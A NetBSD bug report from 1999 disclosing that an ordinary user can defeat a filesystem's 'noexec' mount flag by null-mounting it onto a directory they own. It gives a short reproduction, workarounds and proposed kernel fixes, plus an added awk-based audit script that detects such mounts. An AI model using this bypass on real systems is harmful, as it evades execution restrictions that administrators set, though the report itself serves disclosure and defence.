Subject: kern/7129: normal user can bypass mount 'noexec' flags
To: None <gnats-bugs@gnats.netbsd.org>
From: Manuel Bouyer <bouyer@antioche.lip6.fr>
List: netbsd-bugs
Date: 03/11/1999 16:52:50
>Number: 7129
>Category: kern
>Synopsis: normal user can bypass mount 'noexec' flags
>Confidential: no
>Severity: serious
>Priority: high
>Responsible: kern-bug-people (Kernel Bug People)
>State: open
>Class: sw-bug
>Submitter-Id: net
>Arrival-Date: Thu Mar 11 08:05:00 1999
>Last-Modified:
>Originator: Manuel Bouyer
>Organization:
LIP6, Universite Paris VI.
>Release: 1.3.3 and the 1.3I i386 snapshot
>Environment:
System: NetBSD antifer.ipv6.lip6.fr 1.3.3 NetBSD 1.3.3 (ANTIFER) #1: Sun Feb 28 17:30:48 MET 1999 bouyer@antifer.ipv6.lip6.fr:/usr/src/NetBSD/src/sys/arch/i386/compile/ANTIFER i386
>Description:
It is possible for a normal user to bypass the 'noexec' mount flag
by using a null mount onto a directory they own.
>How-To-Repeat:
garfield:/cd1>id
uid=331(bouyer) gid=100 groups=100, 0(wheel)
garfield:/cd1>pwd
/cd1
garfield:/cd1>mount | fgrep cd1
/dev/wd1a on /cd1 type ffs (NFS exported, local, nodev, noexec)
garfield:/cd1>ls -l
total 3
-rwxr-xr-x 1 bouyer wheel 30 Mar 11 16:39 toto.sh
garfield:/tmp/d>cat toto.sh
#! /bin/sh
echo "not good !"
garfield:/cd1>./toto.sh
./toto.sh: Permission denied.
garfield:/cd1>mkdir /tmp/d
garfield:/cd1>mount -t null /cd1 /tmp/d
garfield:/cd1>cd !$
cd /tmp/d
garfield:/tmp/d>./toto.sh
not good !
>Fix:
Workaround: assure no regular user can execute a binary in a partition
they can write (what's the purpose of 'noexec' otherwise?), and
suppress read/execute permissions on /sbin/mount_* for all but owner.
A long term fix needs to change the semantics of mount for non-root
users:
- mounts for non-root users are always 'noexec' (as they already are
'nodev, nosuid'), possibly dependent on the kernel security level
- or inherit the noexec flag from the partition the target directory
will be mounted on.
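Until the kernel enforces either rule, an administrator can at least spot the condition from mount(8) output. The script below is an added example, not part of the PR or of NetBSD; it assumes the line format mount prints in the report ("<source> on <mountpoint> type <fstype> (<flags>)") and flags every null mount whose source lives on a noexec filesystem but which is not itself noexec. The sample mount lines are constructed for the example.

```shell
#!/bin/sh
# Audit mount(8) output for null mounts that drop the 'noexec' flag of the
# filesystem they are layered on. Reads mount lines on stdin, prints one
# line per offending mount, prints nothing when the layout is clean.
audit_null_mounts() {
    awk '
    # 1 if path is mp itself or lies below it (mp "/" contains everything)
    function under(path, mp) {
        if (mp == "/") return 1
        if (path == mp) return 1
        return index(path, mp "/") == 1
    }
    # each line looks like: <source> on <mountpoint> type <fstype> (<flags>)
    {
        src = $1; mp = $3; fstype = $5
        flags = $0; sub(/^[^(]*\(/, "", flags); sub(/\)$/, "", flags)
        noexec[mp] = (flags ~ /(^|, )noexec(,|$)/) ? 1 : 0
        if (fstype == "null") nsrc[mp] = src
    }
    END {
        for (mp in nsrc) {
            if (noexec[mp]) continue           # null mount already noexec
            best = ""                          # deepest mount holding the source
            for (m in noexec)
                if (under(nsrc[mp], m) && length(m) > length(best)) best = m
            if (best != "" && noexec[best])
                printf "%s: null mount of %s bypasses noexec on %s\n", mp, nsrc[mp], best
        }
    }' | sort
}

# Constructed sample in the mount(8) line format shown in the PR (not real
# output): the first two lines mirror the report, the rest are added to show
# a null mount that kept noexec and a null mount of an exec-allowed source.
SAMPLE_MOUNTS='/dev/wd0a on / type ffs (local)
/dev/wd1a on /cd1 type ffs (NFS exported, local, nodev, noexec)
/cd1 on /tmp/d type null (local)
/cd1/sub on /tmp/e type null (local, noexec)
/usr on /tmp/f type null (local)'

# Run it against the sample; on a live system use: mount | audit_null_mounts
printf '%s\n' "$SAMPLE_MOUNTS" | audit_null_mounts
```

Only /tmp/d is reported: /tmp/e is itself noexec and /tmp/f is layered on the root filesystem, which allows execution.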
>Audit-Trail:
>Unformatted: